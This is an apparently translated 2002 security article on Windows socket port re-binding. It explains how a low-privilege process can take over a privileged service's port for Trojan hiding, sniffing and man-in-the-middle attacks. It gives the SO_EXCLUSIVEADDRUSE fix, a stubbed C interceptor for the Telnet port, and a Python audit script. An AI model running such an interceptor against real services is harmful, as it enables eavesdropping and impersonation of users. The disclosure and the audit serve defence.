Port re-binding: implementing port hiding, sniffing and attacks
http://www.jiejingwang.com 2002-11-11

When programming a Windows Socket server application, the usual code looks like this:

```c
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = htonl(INADDR_ANY);
bind(s, (struct sockaddr *)&saddr, sizeof(saddr));
```

In fact this carries a very large security hazard. In the Winsock implementation a server port can be bound more than once; when deciding which socket a packet is delivered to, the rule is that the most specific binding wins, and there is no division by privilege. That is, a low-privilege user can bind over the port of a service started with high privileges, which is a very significant security hazard.

What does this mean? It means the following attacks can be performed:

1. A Trojan binds to a port on which a legitimate server already exists. It recognises its own traffic by its own specific packet format and handles that itself; anything else it hands to the real server application through 127.0.0.1.
2. A Trojan can bind the port of a high-privilege service application and sniff the information that service processes. Monitoring the communication of a socket on a host normally requires very high privileges, but by simply re-binding the socket you can easily monitor its communication through this socket programming vulnerability, without needing hooking or low-level driver techniques (which require administrator privileges).
3. For some special applications you can launch a man-in-the-middle attack, obtaining information from or deceiving a low-privilege user. For example, intercept port 23 of the Telnet server with Guest permissions: if NTLM encrypted authentication is used you cannot obtain the password directly, but once the admin user logs in your application can act as a man in the middle, impersonating this logged-in user to send high-privilege commands through the socket, achieving the intrusion.
4. For a web server, the intruder only needs low-level permissions to completely change the pages served: very simply, have your own server answer connection requests with different content, or even carry out e-commerce deception and obtain illicit data.

In fact the Socket programming of MS's own services has exactly this problem: the service implementations of TELNET, FTP and HTTP can all be attacked this way, and a SYSTEM application's port can be taken over by a low-privilege user. IIS, including on W2K SP3, is the same. So if an intruder can obtain a low-privilege user account and the other side has these services open, those services are exposed to exactly this attack. And I estimate that many third-party services have this vulnerability as well.

The solution is very simple. When writing code like the above, use setsockopt to specify SO_EXCLUSIVEADDRUSE, requesting exclusive use of the port address and disallowing multiplexing; other processes then cannot bind over it.

Below is an example of a simple interceptor for the MS Telnet server that successfully intercepts as a Guest user; what remains is tailoring to your own needs, such as hiding, sniffing data, or spoofing high-privilege users:

```c
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib, "ws2_32.lib")

DWORD WINAPI ClientThread(LPVOID lpParam);

int main(void)
{
    WORD wVersionRequested;
    WSADATA wsaData;
    BOOL val;
    SOCKADDR_IN saddr;
    SOCKADDR_IN scaddr;
    int err;
    SOCKET s;
    SOCKET sc;
    int caddsize;
    HANDLE mt;
    DWORD tid;

    wVersionRequested = MAKEWORD(2, 2);
    err = WSAStartup(wVersionRequested, &wsaData);
    if (err != 0) {
        printf("Error! WSAStartup failed!\n");
        return -1;
    }

    saddr.sin_family = AF_INET;
    /* The interceptor could also bind INADDR_ANY, but so as not to disturb the
       normal application it should bind a specific IP and leave 127.0.0.1 to
       the real service, then forward to that address. */
    saddr.sin_addr.s_addr = inet_addr("192.168.0.60");
    saddr.sin_port = htons(23);

    if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
        printf("Error! socket failed!\n");
        return -1;
    }

    val = TRUE;
    /* SO_REUSEADDR is the option that permits binding onto an already-bound port. */
    if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (char *)&val, sizeof(val)) != 0) {
        printf("Error! setsockopt failed!\n");
        return -1;
    }
    /* If the real server had specified SO_EXCLUSIVEADDRUSE, this bind would not
       succeed and would return an access-denied error code. Which currently bound
       ports can be re-bound can be tested dynamically; a successful bind indicates
       this vulnerability. UDP ports can be re-bound the same way. */
    if (bind(s, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR) {
        printf("Error! bind failed!\n");
        return -1;
    }
    listen(s, 2);

    while (1) {
        caddsize = sizeof(scaddr);
        /* Accept a connection request and hand it to a worker thread. */
        sc = accept(s, (struct sockaddr *)&scaddr, &caddsize);
        if (sc != INVALID_SOCKET) {
            mt = CreateThread(NULL, 0, ClientThread, (LPVOID)sc, 0, &tid);
            if (mt == NULL) {
                printf("Thread create failed!\n");
                break;
            }
            CloseHandle(mt);
        }
    }
    closesocket(s);
    WSACleanup();
    return 0;
}

/* The article leaves the per-connection handling to the reader's own tailoring;
   this minimal body only closes the accepted socket so the program links and runs. */
DWORD WINAPI ClientThread(LPVOID lpParam)
{
    closesocket((SOCKET)lpParam);
    return 0;
}
```
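As an added example (not code from the original article), the following Python audit shows the fix the article recommends and a check for it: create_listener applies SO_EXCLUSIVEADDRUSE where exclusive=True and the weak SO_REUSEADDR style otherwise, and port_is_rebindable attempts the second SO_REUSEADDR bind the article describes and reports whether the OS refuses it. SO_EXCLUSIVEADDRUSE is a Windows-only Winsock option; on other platforms it is absent from the socket module and the kernel already refuses a SO_REUSEADDR bind over an active listener, so the hardened listener reports False everywhere while the weak listener reports True only on Windows. The loopback address and ephemeral port used below are constructed for the demonstration.

```python
import socket

# SO_EXCLUSIVEADDRUSE exists only in Winsock; look it up defensively so the
# audit also runs on platforms whose socket module does not define it.
SO_EXCLUSIVEADDRUSE = getattr(socket, "SO_EXCLUSIVEADDRUSE", None)


def create_listener(host, port, exclusive):
    """Open a TCP listener on host:port.

    exclusive=True  -> the article's fix: request exclusive use of the address.
    exclusive=False -> the weak pattern the article warns about (SO_REUSEADDR).
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
    if exclusive:
        if SO_EXCLUSIVEADDRUSE is not None:
            s.setsockopt(socket.SOL_SOCKET, SO_EXCLUSIVEADDRUSE, 1)
        # Non-Windows: nothing to set; the OS refuses re-binds over a listener.
    else:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, port))
    s.listen(5)
    return s


def port_is_rebindable(host, port):
    """Audit check: try the second SO_REUSEADDR bind onto an active listener.

    Returns True if the bind succeeds (the service can be bound over) and
    False if the OS rejects it (exclusive binding is in effect).
    """
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
    probe.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        probe.bind((host, port))
        return True
    except OSError:
        return False
    finally:
        probe.close()


def audit_listener(exclusive):
    """Start a listener on an ephemeral loopback port (constructed test
    setup), probe it with port_is_rebindable, and close it again."""
    srv = create_listener("127.0.0.1", 0, exclusive)
    try:
        port = srv.getsockname()[1]
        return port_is_rebindable("127.0.0.1", port)
    finally:
        srv.close()


if __name__ == "__main__":
    print("hardened listener re-bindable:", audit_listener(True))
    print("weak listener re-bindable:", audit_listener(False))
```

Run the script on the Windows host being audited: a True result for a real service's port means that service binds without SO_EXCLUSIVEADDRUSE and is exposed to the takeover the article describes.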